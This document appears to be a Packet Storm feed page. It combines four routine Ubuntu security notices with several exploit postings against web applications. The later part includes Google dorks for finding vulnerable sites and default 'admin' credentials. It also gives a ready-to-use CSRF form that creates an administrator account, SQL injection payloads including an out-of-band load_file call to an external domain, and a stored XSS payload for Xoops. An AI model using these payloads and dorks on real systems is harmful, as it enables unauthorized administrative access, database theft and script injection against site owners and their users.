Ubuntu Security Notice 6148-1 - It was discovered that SNI Proxy did not properly handle wildcard backend hosts. An attacker could possibly use this issue to cause a buffer overflow, resulting in a denial of service, or arbitrary code execution.

=========================================================================  
Ubuntu Security Notice USN-6148-1  
June 12, 2023

sniproxy vulnerability  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

SNI Proxy could be made to crash or run programs if it received specially  
crafted input.

Software Description:  
- sniproxy: Transparent TLS and HTTP layer 4 proxy with SNI support

Details:

It was discovered that SNI Proxy did not properly handle wildcard backend  
hosts. An attacker could possibly use this issue to cause a buffer overflow,  
resulting in a denial of service, or arbitrary code execution.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  sniproxy                        0.6.0-2ubuntu0.23.04.1

Ubuntu 22.10:  
  sniproxy                        0.6.0-2ubuntu0.22.10.1

Ubuntu 22.04 LTS:  
  sniproxy                        0.6.0-2ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
  sniproxy                        0.6.0-1ubuntu0.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  sniproxy                        0.5.0-2ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6148-1  
  CVE-2023-25076

Package Information:  
  https://launchpad.net/ubuntu/+source/sniproxy/0.6.0-2ubuntu0.23.04.1  
  https://launchpad.net/ubuntu/+source/sniproxy/0.6.0-2ubuntu0.22.10.1  
  https://launchpad.net/ubuntu/+source/sniproxy/0.6.0-2ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/sniproxy/0.6.0-1ubuntu0.1

Ubuntu Security Notice USN-6148-1

Ubuntu Security Notice 6156-1 - It was discovered that SSSD incorrectly sanitized certificate data used in LDAP filters. When using this issue in combination with FreeIPA, a remote attacker could possibly use this issue to escalate privileges.

    ==========================================================================Ubuntu Security Notice USN-6156-1June 12, 2023sssd vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:SSSD could allow unintended access to network services.Software Description:- sssd: System Security Services DaemonDetails:It was discovered that SSSD incorrrectly sanitized certificate data used inLDAP filters. When using this issue in combination with FreeIPA, a remoteattacker could possibly use this issue to escalate privileges.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   sssd                            2.2.3-3ubuntu0.11In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6156-1   CVE-2022-4254Package Information:   https://launchpad.net/ubuntu/+source/sssd/2.2.3-3ubuntu0.11

Ubuntu Security Notice USN-6156-1

Ubuntu Security Notice 6155-1 - Dennis Brinkrolf and Tobias Funke discovered that Requests incorrectly leaked Proxy-Authorization headers. A remote attacker could possibly use this issue to obtain sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6155-1  
June 12, 2023

requests vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Requests could be made to expose sensitive information over the network.

Software Description:  
- requests: elegant and simple HTTP library for Python

Details:

Dennis Brinkrolf and Tobias Funke discovered that Requests incorrectly  
leaked Proxy-Authorization headers. A remote attacker could possibly use  
this issue to obtain sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   python3-requests                2.28.1+dfsg-1ubuntu1.1

Ubuntu 22.10:  
   python3-requests                2.27.1+dfsg-1ubuntu2.1

Ubuntu 22.04 LTS:  
   python3-requests                2.25.1+dfsg-2ubuntu0.1

Ubuntu 20.04 LTS:  
   python3-requests                2.22.0-2ubuntu1.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6155-1  
   CVE-2023-32681

Package Information:  
   https://launchpad.net/ubuntu/+source/requests/2.28.1+dfsg-1ubuntu1.1  
   https://launchpad.net/ubuntu/+source/requests/2.27.1+dfsg-1ubuntu2.1  
   https://launchpad.net/ubuntu/+source/requests/2.25.1+dfsg-2ubuntu0.1  
   https://launchpad.net/ubuntu/+source/requests/2.22.0-2ubuntu1.1

Ubuntu Security Notice USN-6155-1

Ubuntu Security Notice 6154-1 - It was discovered that Vim was using uninitialized memory when fuzzy matching, which could lead to invalid memory access. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code. This issue only affected Ubuntu 22.04 LTS, Ubuntu 22.10 and Ubuntu 23.04. It was discovered that Vim was not properly performing bounds checks when processing register contents, which could lead to a NULL pointer dereference. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6154-1  
June 12, 2023

vim vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in Vim.

Software Description:  
- vim: Vi IMproved - enhanced vi editor

Details:

It was discovered that Vim was using uninitialized memory when fuzzy  
matching, which could lead to invalid memory access. An attacker could  
possibly use this issue to cause a denial of service or execute arbitrary  
code. This issue only affected Ubuntu 22.04 LTS, Ubuntu 22.10 and Ubuntu  
23.04. (CVE-2023-2426)

It was discovered that Vim was not properly performing bounds checks when  
processing register contents, which could lead to a NULL pointer  
dereference. An attacker could possibly use this issue to cause a denial  
of service or execute arbitrary code. (CVE-2023-2609)

It was discovered that Vim was not properly limiting the length of  
substitution expression strings, which could lead to excessive memory  
consumption. An attacker could possibly use this issue to cause a denial  
of service. (CVE-2023-2610)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   vim                             2:9.0.1000-4ubuntu3.1  
   vim-tiny                        2:9.0.1000-4ubuntu3.1

Ubuntu 22.10:  
   vim                             2:9.0.0242-1ubuntu1.4  
   vim-tiny                        2:9.0.0242-1ubuntu1.4

Ubuntu 22.04 LTS:  
   vim                             2:8.2.3995-1ubuntu2.8  
   vim-tiny                        2:8.2.3995-1ubuntu2.8

Ubuntu 20.04 LTS:  
   vim                             2:8.1.2269-1ubuntu5.15  
   vim-tiny                        2:8.1.2269-1ubuntu5.15

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   vim                             2:8.0.1453-1ubuntu1.13+esm1  
   vim-tiny                        2:8.0.1453-1ubuntu1.13+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   vim                             2:7.4.1689-3ubuntu1.5+esm18  
   vim-tiny                        2:7.4.1689-3ubuntu1.5+esm18

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   vim                             2:7.4.052-1ubuntu3.1+esm10  
   vim-tiny                        2:7.4.052-1ubuntu3.1+esm10

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6154-1  
   CVE-2023-2426, CVE-2023-2609, CVE-2023-2610

Package Information:  
   https://launchpad.net/ubuntu/+source/vim/2:9.0.1000-4ubuntu3.1  
   https://launchpad.net/ubuntu/+source/vim/2:9.0.0242-1ubuntu1.4  
   https://launchpad.net/ubuntu/+source/vim/2:8.2.3995-1ubuntu2.8  
   https://launchpad.net/ubuntu/+source/vim/2:8.1.2269-1ubuntu5.15

Ubuntu Security Notice USN-6154-1

ProLogin version 1.9 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : ProLogin V1.9 Insecure Direct Object Reference Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : https://codecanyon.net/item/pro-login-advanced-secure-php-user-management-system/12388905?s_rank=169               |  | # Dork      : "Login - ProLogin"                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /index.php/user_settings[-] When you add value (user_settings) after the index.php/,     an error page appears At the same time, it shows you the panel & limited control .[+] http://127.0.0.1/support.ihorizon.sa/index.php/user_settingsGreetings to :=============================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*|===========================================================================================

ProLogin 1.9 Insecure Direct Object Reference

Piyanas version 0.1 suffers from a cross site request forgery vulnerability.

    ====================================================================================================================================| # Title     : Piyanas v0.1 User Login Page CSRF Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : http://www.piyanassystem.com/                                                                                      |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected file : /add_user.php[+] Use Payload : /admin/add_user.php[+]  http://127.0.0.1/piyanassystemcom/piyanasmember/admin/add_user.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Piyanas 0.1 Cross Site Request Forgery

phpAnalyzer version 2.0.4 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : phpAnalyzer v2.0.4 Insecure Settings Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://codecanyon.net/item/phpanalyzer-instagram-audit-report-tool/21933992                                       |  | # Dork      : "Copyright © phpAnalyzer.com. All rights reserved. Product by AltumCode"                                           |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password  [+] Dorking İn Google Or Other Search Enggine.[+] Use user & pass : admin[+] http://127.0.0.1/phpAnalyzer/adminGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

phpAnalyzer 2.0.4 Insecure Settings

EasyAnswer version 1.0.1 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : EasyAnswer version 1.0.1 CSRF Vulnerability                                                                        |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 114.0.1(64-bit)                                            |   
| # Vendor    : https://www.codester.com/items/40311/                                                                              |    
| # Dork      : "© 2022 Easy Answer All rights reserved."                                                                          |  
====================================================================================================================================

poc :

[+] infected file: admins-create.php

[+] Inside folder /admin/admins-create.php

[+] Dorking İn Google Or Other Search Enggine.

[+] Copy the code below and paste it into an HTML file.

[+] Go to the line 17.

[+] Set the target site link Save changes and apply . 

 </i>Create Administrator</h2>  
                  </div>  
                </div>  
              </div>  
            </div>  
          </div>

                    <div class="row">  
            <div class="col-md-12 stretch-card">  
              <div class="card">

                              <div class="card-body">

                                <div id="messages">  
                                 </div>

                 <form action="http://CHANGE_TARGET.com/admin/admins-create.php" method="post" id="main_form" name="main_form" enctype="multipart/form-data">  
                 <input type="hidden" id="submitform" name="submitform" value="1">

                                  <div class="form-group row">  
                      <label for="username" class="col-sm-2 col-form-label">Username:</label>  
                      <div class="col-sm-12">  
                        <input type="text" class="form-control" id="username" name="username" value="" placeholder="ADMIN USERNAME">  
                      </div>  
                 </div>  
                 <div class="form-group row">  
                      <label for="password" class="col-sm-2 col-form-label">Password:</label>  
                      <div class="col-sm-12">  
                        <input type="password" class="form-control" id="password" name="password" value="" placeholder="ADMIN PASSWORD">  
                      </div>  
                 </div>

                                  <div class="form-group row">  
                      <label for="email" class="col-sm-2 col-form-label">E-Mail:</label>  
                      <div class="col-sm-12">  
                        <input type="email" class="form-control" id="email" name="email" value="" placeholder="ADMIN E-MAIL ADDRESS">  
                      </div>  
                 </div>

                                  <div class="row-spaces"></div>

                                  <p>  
                  <button type="button" class="btn btn-primary btn-col-light me-2" onclick="document.main_form.submit();" style=""><span>Submit</span></button>  
                 </p>  
                </form>

                                              </div>  
             </div>  
            </div>  
           </div>

                           </div>

    Greetings to :===================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|          
==================================================================================================

EasyAnswer 1.0.1 Cross Site Request Forgery

Online Thesis Archiving System version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: OTAS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 06.12.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The password parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'was submitted in the password parameter.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain. The application interacted with that domain, indicating thatthe injected SQL query was executed. The attacker can dump allinformation from thedatabase of this system, and then he can use it for dangerous andmalicious purposes!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: password (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')OR NOT 1404=1404-- Eotr    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)## Time spend:01:15:00

Online Thesis Archiving System 1.0 SQL Injection

Xoops CMS version 2.5.10 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Xoops CMS Version 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)# Date: 2023-06-12# Exploit Author: tmrswrr# Vendor Homepage: https://xoops.org/# Software https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.10# Version: 2.5.10# Tested : https://www.softaculous.com/apps/cms/Xoops--- Description ---1) Login admin panel and click Image Manager , choose Add Category : https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images2) Write your payload in the Category Name field and submit:Payload: <script>alert(1)</script>3) After click multiupload , when you move the mouse to the payload name, you will see the alert buttonhttps://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2

Source

Packet Storm